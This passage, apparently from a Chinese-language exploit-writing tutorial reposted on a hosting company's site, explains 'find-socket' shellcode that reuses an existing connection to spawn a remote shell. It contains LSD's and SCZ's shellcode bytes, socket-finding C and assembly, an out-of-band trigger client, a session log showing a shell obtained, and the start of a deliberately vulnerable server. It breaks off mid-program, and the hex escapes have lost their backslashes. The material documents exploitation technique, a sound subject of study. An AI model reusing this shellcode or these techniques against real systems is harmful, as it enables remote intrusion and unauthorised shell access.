客户端:
[bkbll@mobile ownprog]$ ./clientfd
Connecting ....ok
send OOB.......ok
sh-2.05b$ id
uid=500(bkbll) gid=500(bkbll) groups=500(bkbll)
sh-2.05b$
同样可行.
[5] LSD和 scz算法实现
A. LSD C语言算法:
/* From asmcode-1.0.2.pdf downding from lsd-pl.net */
j=sizeof(sockaddr_in);
for(i=256;i>=0;i--){
if(getpeername(sck,&adr,&j)==-1) continue; //这里有一个问题,sck应该是i
if(*((unsigned short)&(adr[2]))==htons(port)) break;
}
for(j=2;j>=0;j--) dup2(j,i);
B. LSD的汇编算法和shllcode
(注意:这里仅仅是find sckcode,并没有dup2和exece等操作):
char findsckcode[]= /* 72 bytes */
"x31xdb" /* xorl %ebx,%ebx */
"x89xe7" /* movl %esp,%edi */
"x8dx77x10" /* leal 0x10(%edi),%esi */
"x89x77x04" /* movl %esi,0x4(%edi) */
"x8dx4fx20" /* leal 0x20(%edi),%ecx */
"x89x4fx08" /* movl %ecx,0x8(%edi) */
"xb3x10" /* movb $0x10,%bl */
"x89x19" /* movl %ebx,(%ecx) */
"x31xc9" /* xorl %ecx,%ecx */
"xb1xff" /* movb $0xff,%cl */
"x89x0f" /* movl %ecx,(%edi) */
"x51" /* pushl %ecx */
"x31xc0" /* xorl %eax,%eax */
"xb0x66" /* movb $0x66,%al */
"xb3x07" /* movb $0x07,%bl */
"x89xf9" /* movl %edi,%ecx */
"xcdx80" /* int $0x80 */
"x59" /* popl %ecx */
"x31xdb" /* xorl %ebx,%ebx */
"x39xd8" /* cmpl %ebx,%eax */
"x75x0a" /* jne */
"x66xb8x12x34" /* movw $0x1234,%bx */
"x66x39x46x02" /* cmpw %bx,0x2(%esi) */
"x74x02" /* je */
"xe2xe0" /* loop */
"x89xcb" /* movl %ecx,%ebx */
"x31xc9" /* xorl %ecx,%ecx */
"xb1x03" /* movb $0x03,%cl */
"x31xc0" /* xorl %eax,%eax */
"xb0x3f" /* movb $0x3f,%al */
"x49" /* decl %ecx */
"xcdx80" /* int $0x80 */
"x41" /* incl %ecx */
"xe2xf6" /* loop */
C. SCZ的shellcode:
From: http://bbs.nsfocus.net/index.php?act=SE&;f=2&t=
144419&p=174118&hl=shellcode
unsigned char remote_shellcode[] =
"xebx57x5fx31xc0x40x89x47"
"x08x31xd2x8dx4fx08x31xdb"
"xb3x0dx04x42xcdx80x31xc9"
"xb5x04x89xcbx51x31xc9xb1"
"x03x31xd2x31xc0xb0x37xcd"
"x80x89xc6x89xc2x80xcex08"
"x41x31xc0xb0x37xcdx80x89"
"xcax8dx4fx08x89xd0x48xcd"
"x80x89xd1x89xf2x31xc0xb0"
"x37xcdx80x59x81x7fx08x4e"
"x53x46x4fx74x06xe2xc3xeb"
"xbdxebx33x31xc9x31xc0xb0"
"x3fxcdx80x41x31xc0xb0x3f"
"xcdx80x41x31xc0xb0x3fxcd"
"x80x89xfbx89x5fx08x31xc0"
"x89x47x0cx88x47x07x31xd2"
"x8dx4fx08xb0x0bxcdx80x31"
"xdbx89xd8x40xcdx80xe8x6f"
"xffxffxffx2fx62x69x6ex2f"
"x73x68;
D. 反汇编得到C算法如下:
int i,k,j;
char buffer[5];
signal(SIGUSR2,SIG_IGN,NULL);
while(1)
{
for(i=4;i>0;i--)
{
j=fcntl(i,GETFL,NULL);
k=j;
j|=0x08;
fcntl(i,SETFL,j);
read(i,buffer,4);
fcntl(i,SETFL,k);
if(strncmp(buffer,"NSFO",4)==0) break;
}
if(i>0) break;
}
dup2(i,0);
dup2(i,1);
dup2(i,2);
execl("/bin/sh","/bin/sh",NULL);
exit(0);
[5] 附录程序
A. 上面利用的client程序:
/* use OOB to identify itself the client socket */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define BUF 1024
main()
{
int port=5555; // connect port
char server[]="192.168.8.114";
int sockfd,on=1;
struct sockaddr_in client;
struct hostent *host;
int i,k,count;
int data1=0,data2=0;
fd_set fds;
char buffer[BUF];
memset(&client,0,sizeof(client));
sockfd=socket(AF_INET,SOCK_STREAM,0); //create socket
/* fill the client struct */
client.sin_port=htons(port);
client.sin_family=AF_INET;
host=gethostbyname(server);
client.sin_addr=*((struct in_addr *)host->h_addr);
printf("Connecting ....");
fflush(stdout);
if(connect(sockfd,(struct sockaddr *)&client,sizeof(struct sockaddr))<0)
{
perror("error");
close(sockfd);
return(0);
}
printf("ok ");
data1='I';
printf("send OOB.......");
fflush(stdout);
if(send(sockfd,&data1,1,MSG_OOB)<1)
{
perror("error");
close(sockfd);
return(0);
}
printf("ok ");
while(1)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sockfd, &fds);
if (select(sockfd+1, &fds, NULL, NULL, NULL) < 0)
{
if (errno == EINTR) continue;
break;
}
if (FD_ISSET(0, &fds))
{
count = read(0, buffer, BUF);
if (count <= 0) break;
if (write(sockfd, buffer, count) <= 0) break;
memset(buffer,0,BUF);
}
if (FD_ISSET(sockfd, &fds))
{
count = read(sockfd, buffer, BUF);
if (count <= 0) break;
if (write(1, buffer, count) <= 0) break;
memset(buffer,0,BUF);
}
}
close(sockfd);
}
B. OOB 程序的汇编注释
/* find code asm */
/* sleep(1)*/
.text
.globl _start
_start:
xorl %eax,%eax
pushl %eax
incl %eax
pushl %eax
movl %esp,%ebx
xorl %ecx,%ecx
movb $0xa2,%al
int $0x80
movb $0x09,%cl
movl %ecx,%eax /*
subl $0x0a,%eax /* eax=edi-10 */
notl %eax /* eax=~eax */
incl %eax /* eax+1 */
movl %eax,%edi
xorl %eax,%eax
incl %eax
decl %esp
movl %esp,%edx /* 存放OOB 数据的地方 */
pushl %eax /* 1 */
pushl %eax /* 1 */
pushl %edx /* &data*/
pushl %edi /* 判断的句柄 */
pushl %ecx /* ecx 入栈 */
leal 4(%esp),%ecx /* socketcall 的arg*/
xorl %ebx,%ebx
movb $0x0a,%bl /* 调用recv */
movb $0x66,%al /* socketcall 调用 */
int $0x80
popl %ecx /* ecx 出栈 */
cmpl $0x01,%eax
jne .+0x07 /* 不相等直接跳转到loop */
/* 相等判断是否位'I' */
cmpb $0x49,(%edx)
je .+0xb /* 相等则直接跳转到dup2这里 */
loop .-0x2c /* 循环 */
xorl %eax,%eax
incl %eax
movl %eax,%ebx
int $0x80 /* 没有找到,退出 */
/* 这里开始dup2 了 */
movl %edi,%ebx
movb $0x03,%cl
movb $0x3f,%al
decl %ecx
int $0x80
incl %ecx
loop .-0x06
/* 开始execve("/bin//sh",argv,NULL) */
pushl %ecx /* argv的NULL */
pushl $0x68732f6e /* n/sh */
pushl $0x69622f2f /* //bi */
movl %esp,%ebx
pushl %ecx
pushl $0x706c692d /* -ilp */
movl %esp,%edx
pushl %ecx
pushl %edx
pushl %ebx
movl %esp,%ecx /* 构造argv */
xorl %edx,%edx /* argenv=NULL */
xorl %eax,%eax
movb $0x0b,%al /* execve 调用 */
int $0x80
C. 一个漏洞程序和用了这个OOB shellcode的exploit
/* vuln.c */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int ptdata(char *buff);
main()
{
int port=5555; // bind port
int sockfd,clifd,on=1;
struct sockaddr_in server,client;
int i,k,flag;
int data=0;
char buffer[1024];
memset(&server,0,sizeof(server));
memset(&client,0,sizeof(client));
sockfd=socket(AF_INET,SOCK_STREAM,0); //create socket
/* fill the server struct */
server.sin_port=htons(port);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(INADDR_ANY);
/* set socket can bind again */
setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on));
printf("Listening ....");
fflush(stdout);
if(bind(sockfd,(struct sockaddr *)&server,sizeof(struct sockaddr))<0)
{
perror("Bind");
close(sockfd);
return(0);
}
listen(sockfd,1);
printf("ok ");
while(1)
{
i=sizeof(client);
clifd=accept(sockfd,(struct sockaddr *)&client,&i);
printf("=========================
亿恩科技地址(ADD):郑州市黄河路129号天一大厦608室 邮编(ZIP):450008 传真(FAX):0371-60123888
联系:亿恩小凡
QQ:89317007
电话:0371-63322206
本文出自:亿恩科技【www.enkj.com】